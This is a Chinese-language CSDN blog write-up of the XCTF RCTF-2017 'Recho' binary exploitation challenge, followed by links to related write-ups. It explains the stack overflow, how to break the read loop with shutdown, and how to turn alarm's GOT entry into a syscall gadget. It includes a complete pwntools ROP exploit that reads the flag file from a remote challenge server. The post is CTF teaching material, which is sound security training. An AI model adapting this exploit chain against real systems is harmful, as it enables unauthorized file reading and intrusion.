XCTF 3rd-RCTF-2017 Recho

最新推荐文章于 2021-09-08 19:54:52 发布
最新推荐文章于 2021-09-08 19:54:52 发布
阅读量816 收藏
点赞数
分类专栏: 栈溢出 堆溢出
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41071646/article/details/96099796
版权

最近感觉事情比较忙  以前就是做了一些题 就总结一下 现在 是 如果题目一下就看出来了 就再也不会写博客了

估计以后博客会 越写越少

然后 这个题目 参考链接

https://www.xctf.org.cn/library/details/e0d90ad9d0609320fd6743706135a80913d27b8d/

主程序

主要是有几点没有想到

第一点就是没有想到怎么退出循环  这个是一直等待着输入的东西

然后 看了一下题解  知道了 还有   shutdown 

然后第二地方就是 没有想到的是 syscall

这个东西以前看过但是确实没有想起来这个思路

直接 用 sysacll 的调用库 然后直接 调用函数

open  flag 文件 然后read  write  就可以了

这里的 syscall  我们就可以直接 通过偏移的出来了

可以看的出来 只要把got 表地址加5 就可以的 ok 了

那么 寻找一波  Rop

 

看见了  add byte ptr [rdi], al ; ret   可以通过这个指令 拿出来 搞定got地址

不过 fd 的值 要搞清楚  linux 的open 返回值是可以算出来的 

这里是docker 镜像 所以直接是 3

那么 下面是脚本

#coding:utf-8
from pwn import *
context.log_level = 'debug'

#io = process('./Recho')
io = remote('111.198.29.45', 53796)

elf = ELF('./Recho')


pop_rax=0x00000000004006fc
pop_rdi=0x00000000004008a3
pop_rdx=0x00000000004006fe
rsi_r15_ret = 0x4008a1
add_rdi_al=0x000000000040070d
flag_addr=0x601058
alarm_got = elf.got['alarm']
read_plt = elf.plt['read']
write_plt = elf.plt['write']
alarm_plt = elf.plt['alarm']
free_addr=0x601090
#rdi,rsi,rdx,r10,r9,r8
#fd=open("flag")
#read(fd, bss_addr, 100)
#write(1, bss_addr, 100)
if __name__ =="__main__":
	
	payload=""
	payload+='a'*0x38
	payload+=p64(pop_rax)+p64(0x5)
	payload+=p64(pop_rdi)+p64(alarm_got)
	payload+=p64(add_rdi_al)

	payload+=p64(pop_rax)+p64(0x2)
	payload+=p64(pop_rdi)+p64(flag_addr)
	payload+=p64(pop_rdx)+p64(0)
	payload+=p64(rsi_r15_ret)+p64(0)*2
	payload+=p64(alarm_plt)

	payload+=p64(pop_rdi)+p64(0x3)
	payload+=p64(rsi_r15_ret)+p64(free_addr)+p64(0)
	payload+=p64(pop_rdx)+p64(0x30)
	payload+=p64(read_plt)


	payload+=p64(pop_rdi)+p64(0x1)
	payload+=p64(rsi_r15_ret)+p64(free_addr)+p64(0)
	payload+=p64(pop_rdx)+p64(0x30)
	payload+=p64(write_plt)


	io.sendline(str(0x200))
	io.sendline(payload.ljust(0x200, '\x00'))
	io.recv()
	io.shutdown("send")
	io.interactive()
	io.close()

pipixia233333
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Recho(xctf)
weixin_43868725的博客
08-10 885
0x0 程序保护和流程 保护: 流程: main() 存在一个很明显的问题,就第二次可以输入的字符串大小是根据第一次输入的数字大小确定的,所以存在一个明显的栈溢出。 0x1 利用过程 1.通过栈溢出控制程序的流程只会发生在函数结束时,但是在这个程序中只要第一次的read函数一直有效程序就不会退出,所以在对栈完成布局之后就需要关闭输入。 2.一旦关闭输入,就不能继续输入了,所以必须一次就把gadget全部布置到栈上。 3.通过提示可以在.data中找到flag字符串。 4.于是猜想需要将名字为flag的
攻防世界高手进阶区——Recho
weixin_62675330的博客
03-11 416
攻防世界高手进阶区——Recho 题目什么也没给。(在这个题困了好久,一直在学基础,但是发现了一个更好用的学习网站,基本 ROP - CTF Wiki (ctf-wiki.org))希望对你们有用,估计以后就转战ctfwiki了。先做完这个题吧。 做题经历 int __cdecl main(int argc, const char **argv, const char **envp) { char nptr[16]; // [rsp+0h] [rbp-40h] BYREF char buf[40]
XCTF Recho
weixin_44164182的博客
01-02 207
XCTF Recho ROP构造linux系统调用 from pwn import * import time from ctypes import * # context.update(log_level='debug', timeout='2') context.log_level = 'debug' context.timeout = 2 # r = process('./Recho') r = remote('220.249.52.134', 54741) elf = ELF('./Recho'
pwn-Recho
醉等佳人归
09-08 272
1.题目 1.保护机制 开启nx 2.关键代码 2.思路 重点1:看出来是个很简单的栈溢出,但是第一个问题是这个循环是个死循环,如果直接使用close()函数程序会直接退出,查询资料后发现pwn库中提供了shutdown()函数,他可以关闭IO流,即让循环正常退出 重点2:既然使用shutdown函数,我们必须一次性将payload发送过去,这就导致我们不能使用内存泄漏来泄漏system函数,查询了一下字符串发现有一个flag,所以我们考虑使用系统调用完成,alarm,open,read,write函数的
RNote XCTF 3rd-RCTF-2017 攻防世界
qq_41071646的博客
06-02 699
这个题 emmm 利用 off by one 然后就是double free 然后 写到 malloc_hook 就ok 不过这个题 我一开始出了一个问题 在 malloc_hook 里面我只是找到了 7f 然后我用了 0x30的堆块 然后不行 malloc的直接在堆块了 没有到我们想要的地方 只能又重新规划 然后 one_gadget 一把梭就好了 存...
XCTF-HW-pipeline附件
最新发布
11-09
附件
XCTF mfc逆向-200
12-22
查壳 vmp。。。 看了大佬博客后得知解法 这是一个MFC程序,但我不会。。。...但是我知道mfc的程序应该都是一个个控件组成 ...发现这两个东西,第一个是窗口类名,第二个我也不晓得是啥,但是它比前面和后面的少了一个消息...
xctf_huaweicloud-qualifier-2020
05-31
xctf_huaweicloud-qualifier-2020写上去译文原始码类别名称网址分数解决了PWN cp 游戏 快速执行 Fastga mysqli 迷你人 nday_container_escape qemu-zzz 网络隐藏云我的1 我的2 派尔 网壳 :cross_mark: 杂项以太网 谁...
XCTF-mobile app2
01-03
app2-安卓逆向1.提取文件2.分析文件3.分析XML文件4.经过验证得到flag5....下载地址:点此下载 1.提取文件 更改app安装包后缀为zip 把这3个文件解压出来 ...然后使用dex2jar将dex文件转换为jar文件,得到一个jar文件,这个...
攻防世界(pwn)Recho(XCTF 3rd-RCTF-2017) writeup
xidoo1234的博客
02-27 1242
深感本题扩充了本人的知识面,遂作文记录下来
(攻防世界)(pwn)(RCTF2017)Recho
PLpa的博客
09-07 1687
0x00.前言 又是一题栈溢出题,但是又有一点点不同。。。 0x01.程序逻辑 程序保护: 程序只开了NX保护,堆栈不可执行。 进入IDA 程序让你先输入你将要输入的字符串长度,然后继续让你输入字符串。 最后,程序会输出你输入的字符串。 看起来,这很像一般的栈溢出,甚至我们可以通过程序的输出把一些敏感的地址给输出出来。 更加让人欣喜的是,这个程序好像给了什么不得了的东西。 0x02.奇怪的东西...
xctf(misc)-部分wp
i_am_not_hacker的博客
08-13 441
ext3 ext3是第三代扩展文件系统,是一个日志文件系统,常用于Linux操作系统。它是很多Linux发行版的默认文件系统。 下载附件后,得到一个linux文件,拖进kali里面,使用mount命令挂载(Linux中mount命令用于挂载Linux系统外的文件) Linux下mount命令与mnt目录详解 挂载后我们使用命令 strings linux | grep flag 来查看字符串,...
xctf pwn1
qq_41071646的博客
05-14 955
这个题目我不知道为什么在网址上面没有打通 我只能在本机上玩了 本机的库是 2.23 所以我也按照 2.23来打了 然后这个题 可以用system 也可以用 one_gadget 用的是 one_gadget 然后说一下这个题 看起来 就是一个简单的 x64的栈溢出 然后我们看一下保护 这里面 有一个 canary 需要绕过的 其实看ida 也能看出来 v6就是我...
攻防世界base除4_攻防世界 - countfatcode - 博客园
weixin_30650059的博客
12-24 93
Recho:这种类型的题目我也是第一次碰见,故记录一些知识点。这题我碰到3个比较难受的坑:不知道怎么结束while循环。我原本的想法是输入一些特殊的字符迫使它读入的字符数为0,结果怎么试发现都能正常读入。不得以去网上看了一下别人的博客,发现pwntools居然有p.shutdown('send')这个功能。据大佬的说法是可以关闭输入流从而强制退出循环。(其实我也不太明白,有知道的大佬可以评论说下)...
XCTF OpenCTF 2017 部分WP(8道)
qq_42192672的博客
10-10 1681
最近想去看看XCTF实训平台,算是给自己的一个督促吧,选的第一个目标是OpenCTF 2017 1. OpenReverse 拖进IDA分析main函数,截图如下 其实就是比较v30与v4地址处的字符串是否相等,v30是我们的输入,那么关键就是看v4了 v4的初始值我们都知道,接下来观察函数40100对v4有什么改变 发现有对v4开始的26个字符全部进行了一个异或操作 当然拉我们动...
hitb2017 sentosa writeup
weixin_30872733的博客
08-31 135
我都快忘了我还有个博客了。。。 这次有幸被XMAN夏令营选为代表去新加坡参加htib线下赛(其实由于太菜变成了新加坡5日游。。。),pwn题被虐哭,在此我要再次感谢一下BrieflyX大佬,要不是出了这道sentosa我们队就会面临一道pwn都做不出来的窘境。:) 这道题是一道很常规的题,没有什么骚套路,就是简单粗暴的栈溢出。不过由于开了PIE和canary,所以需要泄露堆地址、泄露...
xctf----easyjni
qq_41071646的博客
01-22 1426
这个题 也不算是难题把 就是可能要静下心来好好的观察一下把 先看 一下反编译的结果 然后 这里调用了 Main 的 a方法 我们去看一下 这里 参数是经过com/a/easyjni/a 这个包里的 a 方法 然后跟进去 这不用说了 一看就知道了 是变形的base64 这里我们知道了 是我们输入的字符 经过变形的base64 加密 然后...
XCTF 4th-WHCTF-2017 creakme
weixin_30273175的博客
04-02 262
exe文件 运行一下 随便输一下 ps.这个曹操身边的故事挺有意思的 但是没啥卵用....... 查一下壳无壳 ida载入 发现找不到main函数 直接看start感觉逻辑乱乱的(萌新求不喷.....) 百度之,可能是MFC写的,小白真的是纯小白 一脸蒙蔽,第一次接触MFC 看一下大神的题解照着复现了一遍 但是大佬中间有的地方讲的不明白,可能是觉得太简单不需要讲了吧.....
【ZCTF】easy reverse 详解
wodafa的博客
03-02 1106
0x01  前言     团队逆向牛的解题思路,分享出来~ 0x02  内容 0. 样本 bbcdd1f7-9983-4bf4-9fde-7f77a6b947b4.dll 1. 静态分析 使用IDAPro逆向分析样本,样本较小,得到方法列表: 调用关系: PS: 开始受调用关系误导,分析DLL入口函数调用的几个方法,浪费了时间。
web-ics-05
07-28
- *1* *3* [xctf-web-ics05](https://blog.csdn.net/zhejichensha_l7l/article/details/113530046)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值